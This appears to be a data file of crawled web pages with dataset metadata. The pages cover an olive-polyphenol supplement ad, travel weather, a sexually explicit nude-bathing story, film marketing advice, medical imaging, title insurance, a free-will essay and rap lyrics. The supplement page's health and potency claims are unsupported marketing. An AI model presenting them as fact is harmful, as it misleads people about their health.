CreAgri developed a patented environmentally friendly process to harvest the antioxidant potential of organic olives while maintaining the integrity of all the other biophenols together with hydroxytyrosol (HT) in its natural state. This novel invention eventually developed into a formulation platform called HIDROX®.
HIDROX® , originally formulated by CreAgri as a blend of naturally occurring olive polyphenols, is covered by the largest number of patents for composition of matters, manufacturing process and applications that include inflammatory processes, immune modulating, anti-microbial benefits and UV protection.
OLIVA forte™ was the first product to be developed out of the HIDROX® platform. It has been successfully sold for the last 10 years on the International market as a dietary supplements with clear and significant benefits to thousands of users. Its unique broad range of health benefits have been clinically proven in numerous human studies all over the world.
Over the past several years, CreAgri received emails and feedback from users who consume OLIVA forte™. The overwhelming majority of these reported positive benefits and improvement in quality of life as a result of therapeutic effects from OLIVA forte™ on their health indications.
OLIVA forte™ is the latest result from CreAgri's research laboratory. CreAgri has advanced his development to a better and more compact formula. This newly improved OLIVA forte™ delivers much higher and more potent dose of anti-oxidants that is 6,600 times higher than resveratrol (from skin of red ges) rap.
OLIVA forte™ comes in different skus, each specially formulated to meet different needs.
HIDROX® pure organic olive juice in capsules and liquid
HIDROX® plus+ Glucosamine
HIDROX® plus+ Alpha Lipoic Acid
Verify your product is genuine
| dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '357', 'language_id_whole_page_fasttext': "{'en': 0.9266525506973268}", 'metadata': "{'Content-Length': '13774', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:6YALGGHUCT2I7DK7CYRQEYDQQPNKNBBS', 'WARC-Concurrent-To': '<urn:uuid:582fd7ad-0459-47f7-b0eb-543564892f93>', 'WARC-Date': datetime.datetime(2015, 3, 2, 16, 29, 55), 'WARC-IP-Address': '110.4.45.135', 'WARC-Identified-Payload-Type': None, 'WARC-Payload-Digest': 'sha1:3SEDXGFWPLXDKHMIIBJPYS6VJRSTUFQ5', 'WARC-Record-ID': '<urn:uuid:add5dcd4-e796-4271-9594-28203afdba78>', 'WARC-Target-URI': 'http://www.olivaforte.com/hidrox', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:2b90fc2c-72d1-4a61-9b7d-36768b47eab8>', 'WARC-Truncated': 'length'}", 'previous_word_count': '705', 'url': 'http://www.olivaforte.com/hidrox', 'warcinfo': 'robots: classic\r\nhostname: ip-10-28-5-156.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2015-11\r\noperator: CommonCrawl Admin\r\ndescription: Wide crawl of the web with URLs provided by Blekko for February 2015\r\npublisher: CommonCrawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.06424462795257568', 'original_id': '6198ca085de71ef267acd32d9395600a018891f7e4d07c6ee06602f25c6f3669'} |
Avg weather in April
12 Hrs per day
141 mm per month
78 % avg
12 Mph avg
What’s the weather like in Bavaro in April?
April is considered the best time to visit because Bavaro weather in April is warm, sunny and dry. You’ve also made it just in time to enjoy the last month of the dry season, meaning you’ll get to appreciate the high temperatures of the subtropical climate without much chance of rain.
Geographical influences
Since it’s located where the Caribbean Sea meets the Atlantic Ocean, Bavaro is a well sought-after resort for beach fans and water sports enthusiasts. It has a tropical climate with high temperatures all year round and is the perfect destination for a luxury holiday in the sun.
Since it’s edging closer to the wet season, April is a lot warmer than previous months. It has an average high temperature of 26°C that increases to 27°C towards the end of the month. You’ll get to enjoy 12 hours of sunshine per day before the sun goes down for the night. April has 141mm of rain, which is typical of Bavaro’s tropical climate. Humidity is at 78% with wind speeds reaching 12 Mph.
View weather for | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '0', 'language_id_whole_page_fasttext': "{'en': 0.9381582140922546}", 'metadata': "{'Content-Length': '50235', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:FAGRTN2HQS2ZTKHGXQO5LGGJXON4JR2S', 'WARC-Concurrent-To': '<urn:uuid:7c04d6a8-18fc-459e-83c5-f6fabcef2bd4>', 'WARC-Date': datetime.datetime(2018, 9, 23, 2, 38, 49), 'WARC-IP-Address': '134.213.32.160', 'WARC-Identified-Payload-Type': 'text/html', 'WARC-Payload-Digest': 'sha1:5GPNN4ONYRIULPG3AKZOEN3DBUL427QO', 'WARC-Record-ID': '<urn:uuid:bee55145-36fd-4377-893c-2148e9cf0fe3>', 'WARC-Target-URI': 'https://www.thomascook.com/holidays/weather/caribbean/dominican-republic/punta-cana/bavaro/april/', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:e53690a0-17d0-419a-aa49-3ab7c35e58dd>', 'WARC-Truncated': None}", 'previous_word_count': '209', 'url': 'https://www.thomascook.com/holidays/weather/caribbean/dominican-republic/punta-cana/bavaro/april/', 'warcinfo': 'isPartOf: CC-MAIN-2018-39\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for September 2018\r\noperator: Common Crawl Admin (info@commoncrawl.org)\r\nhostname: ip-10-113-176-82.ec2.internal\r\nsoftware: Apache Nutch 1.15 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 0.11-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.03377330303192139', 'original_id': '5729e2d1e197d34db8f26e00c8ccf59c646340a2af6c5daaa584744007e94904'} |
Walking Nude in the Rain
Lara found a place a few feet away from the stream bed where she could squat down and relieve herself.
The rain was still falling hard, but under the canopy of thick growth oaks, she some protection. But there were still heavier drops of water falling from the leaves that hit her on the head, her shoulders, and her back.
As she crouched down, beads of water rolled down her shoulder blades and and channeled itself down the small of her back. Water continued to roll off her head, and dripped off the end of her nose. It was quite cold, and she shivered while relieving herself.
After finishing, there was no paper, nor anything to clean herself. But she already had an idea. She stood up and walked into the middle of the stream, with the water reaching up to her knees. Even though it was cold, the water felt no colder than the air, and no colder than how her body felt.
She crouched down and submerged her lower half under the running water.
Lara reached with her right hand between her legs and used her fingers to clean her rear end.
Even though she was on someone's private property, and even though it was raining, she still found it beautiful and serene, and still felt like she was alone in the wilderness. It was like how she had seen in some paintings of nude nymphs bathing in a forest stream. She wanted to be one of those nymphs, somehow free from society, free to live as they pleased, nude, and at one with nature.
Except her upper half was still shivering cold.
But it didn't take much at all for the lower half of her body to adjust to the cool water temperature, and now it almost felt as if it was warmer than the air temperature with the falling rain. The water rushed from beneath her, its force stimulating her labia.
Lara's head was hung over, facing down towards the water, while her body was tightened trying to generate heat. A constant swoosh of wind and rain blew through the tree canopy, with a steady patter of water droplets tapping the leaves on the ground.
A distant, soft cry echoed.
Lara picked her head up, and listened.
Again she could barely hear from far away.
Lara stood up in the stream, and then walked to the side and climbed up the bank. Now out of the water, her body became more cold. The voice must have come from Nan; she was supposed to come back with a towel for her dry off with.
Back at the house, Julia sat in a reclining chair in the living room, while a warm fire crackled in the fireplace.
"I made you some hot tea, Julia. It'll relax you." the old lady said while sitting on a coffee table next to the chair.
"Thanks." Julia smiled.
"I just want to apologize for this afternoon. We just don't get many strangers, and we have to be careful around here."
"Yeah, I understand", Julia answered and smiled.
Julia felt very uncomfortable alone with a strange old woman who hours earlier had a rifle pointed at her. She wasn't used to being left to her own devices like this, always having her father and mother to available to rely on. And there was something strange about this old woman and her daughter Nan. They seemed quite reclusive, no available car, no working telephone, anything could happen here and no one would know about it.
Lara emerged from the thick growth of oak trees and found Nan several yards away. "Nan?" she called out.
Nan turned around to look and saw Lara. She walked towards her.
"Where'd you go?" she asked.
"I just did a little exploring in the trees." Lara answered.
"You're going to catch a cold out here, especially if you're going to go around naked." She said. "I put a towel and some blankets in the barn for you."
"Thanks", Lara answered.
Lara entered into the barn, with Nan following behind. Lara's body was dripping with water. Her hair completely soaked as if she had just taken a shower, and shivering and shaking uncontrollably.
Nan picked up the towel and opened it up. Lara walked to retrieve it.
"Here" Nan said, wrapping it around Lara's back.
Lara dried herself off. Nan stood and watched. Removing the water off her skin helped make Lara not shiver so much, and feel just a little more comfortable. | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '0', 'language_id_whole_page_fasttext': "{'en': 0.986992359161377}", 'metadata': "{'Content-Length': '50333', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:VHLZOKBKVZGRNLWV5NVGWVAT7AVPR3HW', 'WARC-Concurrent-To': '<urn:uuid:73b92812-389c-4cb6-8c25-2fb35a9291da>', 'WARC-Date': datetime.datetime(2014, 8, 2, 6, 31, 52), 'WARC-IP-Address': '74.125.228.11', 'WARC-Identified-Payload-Type': None, 'WARC-Payload-Digest': 'sha1:XSPREMTUZKBK3237P4LRQQIROETMQQKO', 'WARC-Record-ID': '<urn:uuid:f5ab6d2e-885b-49e5-9845-3e3ff0e89253>', 'WARC-Target-URI': 'http://fulltimelara.blogspot.com/2010/12/walking-nude-in-rain.html', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:20243c86-e4ba-4430-ae23-3b58f2e097f0>', 'WARC-Truncated': 'length'}", 'previous_word_count': '747', 'url': 'http://fulltimelara.blogspot.com/2010/12/walking-nude-in-rain.html', 'warcinfo': 'robots: classic\r\nhostname: ip-10-146-231-18.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2014-23\r\noperator: CommonCrawl Admin\r\ndescription: Wide crawl of the web with URLs provided by Blekko for July 2014\r\npublisher: CommonCrawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.21598690748214722', 'original_id': 'cb7ab375e93e64b5b2fca58bcc96e85e092894dc6151625b98b51a2f4bbcf612'} |
Why A One-Sheet Is Almost As Important As The Movie You Made
A lot of filmmakers think that when they're done their filmic masterpiece the festivals will beg to play it, the distributors will instantly send offers, and peace will fall over the planet. But this is not the case.
I got lucky with my first film, "Hunting Humans". I put together a really crappy one-sheet myself, but because my film was high concept it got picked up. You probably won't be so lucky.
I got even luckier on my second film. I hired a guy named Erik Ashley to design a poster for "Fear of Clowns". He put together a couple of great ones, and I can tell you this with absolute sincerity:
His poster got Lionsgate to pick up my film.
Yes, you read that right.
You have to understand that most distributors are fairly unimaginative. They're businessmen for the most part. They may see a film and they won't "get" it. But when they see a great one-sheet, a one-sheet that does all their work for their them, a one-sheet that makes THEM want to see it...that's when you get them interested.
Sure, you then need to back it up with a trailer that is good and a movie that is at least adequate, but the one-sheet is that all-important first step. Because if, after looking at your one-sheet, THEY want to see it then they don't have to figure out how to market it. You've shown them.
My one-sheet--pretty bad MTI's one-sheet/video cover
Since that first poster, I've had Erik do every other poster for me, and he's phenomenal. He's creative, easy to work with, and willing to negotiate fees with indy filmmakers even though he's worked for some big-name firms(Virgin Music, Golden Palace, CBS Sportsline) for some big-name money.
Which leads me to the question, "You DID take stills while you were shooting your movie, didn't you?" And I mean good stills, not behind the scenes stuff for Facebook or Myspace. I mean, pictures you might see on the back of the dvd box.
I can't stress how important stills are. Not only for your press kit, but they're used to make your one-sheet. If you're not an excellent photographer, hire one. It's important. You need someone who knows how to shoot pictures without using the flash. Interesting compositions of the best stuff from your movie--FX shots, shots lit with artistic flair, whatever would make someone look at the photo and say, "I wanna see that movie."
Don't make the mistake I made, and one that filmmakers are making right now: Just because you have Photoshop doesn't mean you know how to produce a professional poster. You may think you do, but once you've seen a pro's stuff you will quickly understand how little you know.
Stay a filmmaker. Let the professional designers like Erik handle what they do best...sell your work by creating incredible advertising through one-sheets.
You can check Erik out and see more samples at www.erikashley.com and tell him I sent ya!
Erik's one-sheet LGF's one-sheet. Look familiar?
More one-sheets created by Erik for my films
To read about the making of some of my films, check out:
To check me out on imdb go to:
Copyright 2009 Kangas Kahn Films, LLC | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '0', 'language_id_whole_page_fasttext': "{'en': 0.9648202061653136}", 'metadata': "{'Content-Length': '6092', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:76UYAOFXINRRGC7RSATDZAF4NLCJGM3Y', 'WARC-Concurrent-To': '<urn:uuid:ce3c19ed-7ec8-4352-a0ae-0b1660a8ea47>', 'WARC-Date': datetime.datetime(2018, 4, 19, 9, 55, 7), 'WARC-IP-Address': '66.96.147.117', 'WARC-Identified-Payload-Type': 'text/html', 'WARC-Payload-Digest': 'sha1:UQMAKDOUOUEKLOCIFOYX6R6BSID2Z3PH', 'WARC-Record-ID': '<urn:uuid:d77f8c71-6002-45ba-b88f-58a6e5b89136>', 'WARC-Target-URI': 'http://www.kangaskahnfilms.com/1sheet/', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:966dcc85-9342-4cb8-a3ce-12fc18b78dce>', 'WARC-Truncated': None}", 'previous_word_count': '547', 'url': 'http://www.kangaskahnfilms.com/1sheet/', 'warcinfo': 'robots: classic\r\nhostname: ip-10-142-209-235.ec2.internal\r\nsoftware: Nutch 1.6 (CC)\r\nisPartOf: CC-MAIN-2018-17\r\noperator: Common Crawl Admin\r\ndescription: Wide crawl of the web for April 2018\r\npublisher: Common Crawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.09289026260375977', 'original_id': 'd2f60d0664175670562e364ee8d6e354005671f5aac38db40e68c38bbac3f195'} |
How Imaging Tests Can Help You
Image result for How Imaging Tests Can Help You'''/./..'
July is Sarcoma Awareness Month. The hallmark aims to remember sarcoma, often called the “forgotten cancer.” While there is no cure for cancer, treatment, diagnosis and prevention have come a long way, thanks to technology such as CAT scans and MRIs, both of which offer varied uses in clinical practice.
For Treatment
Imaging techniques allow healthcare providers to identify and pinpoint the problem as much as possible. Such outlines would be especially valuable for surgeons so they have a better idea of what to expect before they head into the operating room.
It is also worthwhile to note that for patients who have claustrophobia, they now have other options such as advanced medical imaging in Toms River NJ that offer open MRI scans in addition to the traditional closed MRI machines.
For Diagnosis
Imaging tests come in especially handing for detecting tricky cancers such as soft tissue sarcoma, which has many various types. In such cases, it is vital to diagnose the exact type of the tumor so the best plan of attack can be determined.
With cancer, timing is everything. Especially for those with a family history of soft tissue sarcomas, it is best to pay attention to some common symptoms, which include a lump that may or may not hurt and grows over time typically in an arm or a leg. Testing for sarcoma would include imaging tests and biopsies.
For Prediction
Family histories play a key role in people’s health. Knowing you have a predisposition means more screening for you. If you know your family has a history of breast cancer, for example, routine mammograms could help you catch it early enough to make a difference in the outcome.
While imaging tests can only screen for breast cancer, they can, however, be used to predict strokes. Carotid artery MRI has been touted by researchers as being able to predict strokes accurately.
From stroke to cancer, imaging tests can be valuable. These are just some of the ways different imaging tests can help you. | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '0', 'language_id_whole_page_fasttext': "{'en': 0.9691360592842102}", 'metadata': "{'Content-Length': '46707', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:F4S7EJDEEAQS2NBEM4JDENFIBSITXL7O', 'WARC-Concurrent-To': '<urn:uuid:37ceb5bb-0d99-41dd-9602-a0f41ba60e83>', 'WARC-Date': datetime.datetime(2020, 1, 18, 9, 41, 3), 'WARC-IP-Address': '104.27.174.164', 'WARC-Identified-Payload-Type': 'text/html', 'WARC-Payload-Digest': 'sha1:E6EVZJR2HXTO4SFZGIC5BGX5SQEH57FX', 'WARC-Record-ID': '<urn:uuid:d3457cf0-6dbc-46e7-ae9a-493ca6dcc3bd>', 'WARC-Target-URI': 'https://www.iamconnections.com/lifestyle/health/how-imaging-tests-can-help-you/', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:26e05eb4-d45c-40c6-88e0-a044f129e2b1>', 'WARC-Truncated': None}", 'previous_word_count': '350', 'url': 'https://www.iamconnections.com/lifestyle/health/how-imaging-tests-can-help-you/', 'warcinfo': 'isPartOf: CC-MAIN-2020-05\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for January 2020\r\noperator: Common Crawl Admin (info@commoncrawl.org)\r\nhostname: ip-10-67-67-154.ec2.internal\r\nsoftware: Apache Nutch 1.16 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.1-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.025213778018951416', 'original_id': 'b653b6064509dff64bc6eacaf72a90c11ee60fb2341c7d44c4a6eb697c92d706'} |
The Museum of Modern and Contemporary Art in Nusantara (Museum MACAN) is an art museum in Jakarta. It provides public access to a significant and growing collection of modern and contemporary art from Indonesia and around the world. The Museum has an active program of exhibitions and events in a 7,100 square meter facility including onsite education and conservation spaces. | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '23', 'language_id_whole_page_fasttext': "{'en': 0.9334929585456848}", 'metadata': "{'Content-Length': '92168', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:I33SWEEJPTSV5ADVWGJ2JJPOVO5IRLEO', 'WARC-Concurrent-To': '<urn:uuid:b708f7e5-470b-4a72-b0f1-4273bd0e072a>', 'WARC-Date': datetime.datetime(2020, 9, 27, 9, 54, 42), 'WARC-IP-Address': '23.227.38.32', 'WARC-Identified-Payload-Type': 'text/html', 'WARC-Payload-Digest': 'sha1:C7OBP2ULVLFMTDJ4XRCKE6CXDC7XBZDL', 'WARC-Record-ID': '<urn:uuid:bcad7f62-dd43-4176-b278-ff4441b524ab>', 'WARC-Target-URI': 'https://shop.museummacan.org/pages/about-museum-macan', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:3a9af39b-489f-4d42-b966-62c698a33da6>', 'WARC-Truncated': None}", 'previous_word_count': '59', 'url': 'https://shop.museummacan.org/pages/about-museum-macan', 'warcinfo': 'isPartOf: CC-MAIN-2020-40\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for September 2020\r\noperator: Common Crawl Admin (info@commoncrawl.org)\r\nhostname: ip-10-67-67-11.ec2.internal\r\nsoftware: Apache Nutch 1.17 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.2-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.04728353023529053', 'original_id': '4a1ef8663a2c799ec5f99c6280b726769f3f8d28cfa9656dd7f558fe954111e8'} |
Every year the people involve in TFS prepare a newsletter to inform about all the things that have happened during that year.
Thanks to the volunteers and the people involve we can proudly show to you these newsletters that we hope you will enjoy as much as we did doing them. | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '0', 'language_id_whole_page_fasttext': "{'en': 0.987374484539032}", 'metadata': "{'Content-Length': '96216', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:6JS3K2POMA5UZBDF5GPKPBNTNCMQJ6GC', 'WARC-Concurrent-To': '<urn:uuid:5636ee9e-a01c-435e-8430-434e8938d748>', 'WARC-Date': datetime.datetime(2019, 4, 20, 14, 18, 16), 'WARC-IP-Address': '66.33.209.89', 'WARC-Identified-Payload-Type': 'text/html', 'WARC-Payload-Digest': 'sha1:A6MSTTI4BNXIQPG5B6JQVQQEJEOASRLL', 'WARC-Record-ID': '<urn:uuid:494901dd-ec69-49b2-9416-6d2c7e7d66dc>', 'WARC-Target-URI': 'http://www.toolsforsolidarity.com/publications/newsletters/', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:1db2a022-605e-43b3-9acf-ed162fb772af>', 'WARC-Truncated': None}", 'previous_word_count': '52', 'url': 'http://www.toolsforsolidarity.com/publications/newsletters/', 'warcinfo': 'isPartOf: CC-MAIN-2019-18\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for April 2019\r\noperator: Common Crawl Admin (info@commoncrawl.org)\r\nhostname: ip-10-141-45-27.ec2.internal\r\nsoftware: Apache Nutch 1.15 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.1-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.5932608842849731', 'original_id': '4bad29569c8d1e3fcd2ddd0959b4fab9c004e2cbdf879e71ddcd4758e02e3afc'} |
Why Title Insurance Is So Important For Home Buyers
pict attributed by pixabay.com
Obtaining title insurance is a standard step that home buyers need to take before they close on a home purchase. It is critical for a home buyer to get title insurance since it protects both the lender and the buyer from the possibility that the seller doesn’t have clear and free ownership of the property and home, and therefore, does not have the legal right to transfer full ownership over to the buyer. Although there is a fairly low chance that you will need to call on title insurance for coverage, the value of what you could stand to lose when you don’t have coverage is very high – in fact, you could end up losing the house itself.
How To Obtain Title Insurance
Your closing or escrow agent will get the process started of obtaining your title insurance port charlotte fl after you have signed your purchase agreement. You will probably need to pay a one-time fee of approximately $1,000 to get title insurance.
If You Didn’t Get Title Insurance, What Could Happen?
There are several things that could go wrong. The most serious problem could be that someone could attempt to sell you a house that she or he does not own. However, there are other issues that are less devious but more complex. For example, a seller could have co-purchased a home with a brother ten years ago that he has not spoken to since and not realize his brother’s signature is needed in order to sell the house. Or a seller may have inherited the house but it turns out that the terms of the will are out of date and the house has been left to someone else.
There can also be liens filed against a house where agencies or individuals have legally claimed through public records the right to be paid from the property sale’s proceeds to settle an owner’s debt with them. These debts could include things like contractor’s fees, child support, and taxes. In all of these types of situations, title insurance can help.
Protection Provided By Title Insurance
An extensive title search of a property is required by title insurance. The search will help to minimize any potential liabilities by discovering possible title issues. Title insurance also defends a property owner against any litigation challenging the legality and validity of a new property owner. That is why obtaining title insurance is so important when purchasing property.
Author: Maxy El Tiara
Share This Post On
Submit a Comment | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '0', 'language_id_whole_page_fasttext': "{'en': 0.9665155410766602}", 'metadata': "{'Content-Length': '50770', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:UJLFQE3XYZHPFSNSVNX2752KX4RPQU7R', 'WARC-Concurrent-To': '<urn:uuid:ac5e4a07-aefe-41ee-996d-47f432039ee2>', 'WARC-Date': datetime.datetime(2019, 3, 22, 22, 21, 29), 'WARC-IP-Address': '104.18.45.177', 'WARC-Identified-Payload-Type': 'text/html', 'WARC-Payload-Digest': 'sha1:RIIOS3YXUTVCAVN5Q7ZTTLBZQKO6QBHE', 'WARC-Record-ID': '<urn:uuid:372e94d5-fec4-4455-abf5-fbbeb0bf65c9>', 'WARC-Target-URI': 'https://mexicoeliterealestates.com/why-title-insurance-is-so-important-for-home-buyers.html', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:dfe17d9a-d73e-4b14-9fe3-8de687aabc27>', 'WARC-Truncated': None}", 'previous_word_count': '427', 'url': 'https://mexicoeliterealestates.com/why-title-insurance-is-so-important-for-home-buyers.html', 'warcinfo': 'isPartOf: CC-MAIN-2019-13\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for March 2019\r\noperator: Common Crawl Admin (info@commoncrawl.org)\r\nhostname: ip-10-140-246-66.ec2.internal\r\nsoftware: Apache Nutch 1.15 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 0.11-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.03580588102340698', 'original_id': 'ca234cb5bfb1ae06ff054f13c1a9d5bf0c89d0a2e951c9a396d9465e45297356'} |
Essays on Religious Topics
number 2: God’s Knowledge and Free Will
An important idea in most western religions is the notion of free will. It is widely believed that humans have free will, and, thereby, the ability to choose between good or evil, that is following God’s laws or disobeying them. Disobedience results in sin, and the presence of sin might result in condemnation to hell. The entire structure of morality, goodness, sin, reaching heaven, or being condemned to hell is based on the idea that each person has free will.
Another important idea is that God is omniscient that is He knows everything about the universe as well as our past, present, and future behavior. This knowledge of our behavior will be used by God to determine whether or not we will ascend into heaven or descend into hell.
Argument number 1 If God is omniscient, there is no free will.
If God knows the future, and that knowledge is true, then there is no free will. What God knows must happen and no other choice is possible. The only reason that future behavior appears to be free is that we do not know what will happen so we think that we are free. God, then, controls the future through His knowledge, and that knowledge, being true, must occur. A common response to this argument is that while God knows the future He does not force us to behave in any particular way. This response offers no solution. If God’s knowledge is true, then any “choice” we might make is already known to Him and that choice has been known for countless millennia.
Argument 2 If God is omniscient, there is no sin.
The idea of sin is based on free will because people choose between good and sin. However, if God is omniscient, then there is no free will and, therefore, no sin.
Argument number 3 If free will exists, God cannot be omniscient.
In order for free will to exist, God’s knowledge must be contingent that is God must wait until a person does something in order to know what was done. If this condition exists, then God does not know the future, and our idea of God’s omniscience is, at best, only partially correct.
Argument number 4 If God knows the future, then we are all predestined and predetermined.
Knowledge of the future means that all future behavior is predestined and predetermined because no other possibility exists. God’s knowledge cannot be both true and contingent; it must be one or the other. If God’s knowledge of the future is true, then that knowledge must happen. God’s knowledge is not a prediction of what might happen, it is a statement of what will happen, and that statement is certainly true.
The argument that divine foreknowledge is not compatible with free will is known as theological fatalism. If man is truly free to choose between different alternatives, it is very difficult to understand how God could know in advance which way he will choose. Several attempts to resolve this difficulty have been proposed. The following summary is a review with my comments.
I answer that this proposition offers no solution because freedom from coercion is inherent in the idea of free will.
I answer that the key word in this proposition is “somehow”, and that idea obscures rather than explains this issue. In essence, this proposition argues for an incessant miracle.
I answer that knowing all of the possibilities still does not solve the issue, because God knows which possibility a person will select, and because God’s knowledge is true, that possibility must happen.
I answer that while this idea might explain the forces acting on a decision, it does not explain the problem. God still knows what we will do.
I answer that there is no basis for this conjecture. Furthermore, if this argument is true then it limits the extent of divine knowledge in an undefined way. Thus, this idea offers no solution.
To the main argument, I answer that God cannot know the future. That which has not happened is merely potency, thus there is nothing to know. God must wait for an action in order to know an event has occurred. It can be argued that God knows all of the possibilities, but until one of those possibilities is activated, no choice exists, and there is still nothing for God to know.
This answer solves several issues at once. It preserves free will, permits the possibility of divine intervention, retains our knowledge of time, and allows the potential influence of prayer.
Go to: Family Arts or Carro Family Home page | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '0', 'language_id_whole_page_fasttext': "{'en': 0.933305561542511}", 'metadata': "{'Content-Length': '9843', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:CZ6A3XLBUUCJLNOZ7MJNRNZTGBHZPFKX', 'WARC-Concurrent-To': '<urn:uuid:95a3bb67-2e35-4b00-9b23-2a23cc47ee92>', 'WARC-Date': datetime.datetime(2018, 11, 21, 20, 38, 21), 'WARC-IP-Address': '45.40.165.10', 'WARC-Identified-Payload-Type': 'application/xhtml+xml', 'WARC-Payload-Digest': 'sha1:XXJ3EYNQLCAR4TOPPQVAV6QE6XH7HXON', 'WARC-Record-ID': '<urn:uuid:7a7b2571-57f1-43e1-8b40-1c78cf6e59af>', 'WARC-Target-URI': 'http://carrofamily.com/FreeWill.html', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:23761e7f-c681-4386-b403-7cbd7e6c89b5>', 'WARC-Truncated': None}", 'previous_word_count': '772', 'url': 'http://carrofamily.com/FreeWill.html', 'warcinfo': 'isPartOf: CC-MAIN-2018-47\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for November 2018\r\noperator: Common Crawl Admin (info@commoncrawl.org)\r\nhostname: ip-10-5-198-138.ec2.internal\r\nsoftware: Apache Nutch 1.15 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 0.11-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.03952401876449585', 'original_id': 'db9581052d7d247e267a18f62113e1a837bafcffaa69ca4d00709bf5aba795f5'} |
Back to the previous page
Artist: Eightball and MJG
Album: How to Be a Player soundtrack
Song: In the Wind
Verse One: MJG
Here comes the one they call the P.I. -- M.P.
Straight out the cut no one can see I -- bust these
Way out of touch with all them bustas in my rear view
but see they game, so lame, I can hear through
I Hens doggin at the bar, actin real nice (real nice)
Six pack of Hen, straight up, with no ice -- tap me twice
Did you really want my full attention?
Sometimes my mind (intertwine) with the tenth dimension
I see you inchin to my ride, tired, rest them legs
Soon as you open up your mouth (uhh) there's the head
Now who I be, MJG, certified, mic controller
(Uncle Sam, I want you!) Trick bend over
I'm a petrified rapper talkin, and you ain't nuttin
but an electrified shyster walkin, I'm tired of savin
people from takin these dead end trips, I'ma just go
and bust this champagne upside your ship, alright you hip?
You in a hurry? You can't relate?
Don't ever say that I ain't try to set it to you straight
I'm out the gate before you hate but I'll be back again
You saw me faintly through the crowd but now I'm in the wind
Once again
Chorus: Eightball and MJG
